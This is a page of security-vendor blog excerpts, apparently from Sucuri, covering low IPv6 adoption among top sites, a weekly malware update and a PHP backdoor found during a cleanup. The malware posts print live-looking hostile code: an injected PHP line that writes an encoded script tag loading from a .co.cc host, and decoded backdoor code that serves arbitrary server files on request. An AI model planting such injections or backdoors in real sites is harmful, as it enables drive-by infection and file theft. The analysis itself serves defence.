IPv6 is not here (yet). In fact, it is still very far

There is news that because the final IPv4 blocks have been allocated, that IPv6 is supposely “here” now. The news came from APNIC:

APNIC received the following IPv4 address blocks from IANA in February 2011 and will be making allocations from these ranges in the near future:
* 39/8
* 106/8

APNIC reiterates that IPv6 is the only means available for the sustained ongoing growth of the Internet, and urges all Members of the Internet industry to move quickly towards its deployment.

Yes, the final /8 blocks have been allocated. And I agree that with the limited number of IPv4’s, we will need to figure out something to do very soon (everyone migrate to IPv6, use more NAT, etc). However, that doesn’t mean that IPv6 is here already…

In fact, I checked the TOP 1 million sites from Alexa and only 1,981 of them have IPv6 enabled in their main domain. It means that only 0.19% of them have it already. Very far from mainstream usage.

From the top 10k domains, only 57 have IPv6 enabled (a mere 0.57% of sites):

Read More

Weekly malware update – 2010/Jan/31

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

.co.cc malicious entries

We reported those issues a while ago (here and here), but we are still seeing a large number of sites infected. The following code is added to a javascript file:

<?php $de=”HTTP_USER_AGENT“;$ar=$_SERVER[$de];if(stristr($ar,”MSIE“)&&stristr($ar,”Windows“))echo “Document.write(unescape(“%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%77%64%64%2E%63%6F%2E%63%63%2F%34%31%22%3E%3C%2F%73%63%72%69%..74%3E`));”

With an .htaccess modification to make such code work:

Read More

Backdoor: No malware on this code, you can check it by yourself

We were cleaning up an infected web site a few days ago and it had multiple backdoors. They all started like that:

<?php
// ketek90@gmail.com
// no malware on this code, you can check it by yourself ; – )

We see this very often, where malware authors put valid headers and messages to try to disguise what it does, but never in such a direct way. I guess it just made the job easier for us…

You can see the full backdoor here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=1c7166d7336a50e52175224878466616

As far as what the code does, it decodes to a backdoor:

if(isset($_GET['dl']) && ($_GET['dl'] != “”)){ $file = $_GET['dl']; $filez = @file_get_contents($file); header(“Content-type: application/octet-stream”); header(“Content-length: “.strlen($filez)); header(“Content-disposition: attachment; filename=\””.basename($file).”\”;”); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != “”)){ $file = $_GET['dlgzip'];…


To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.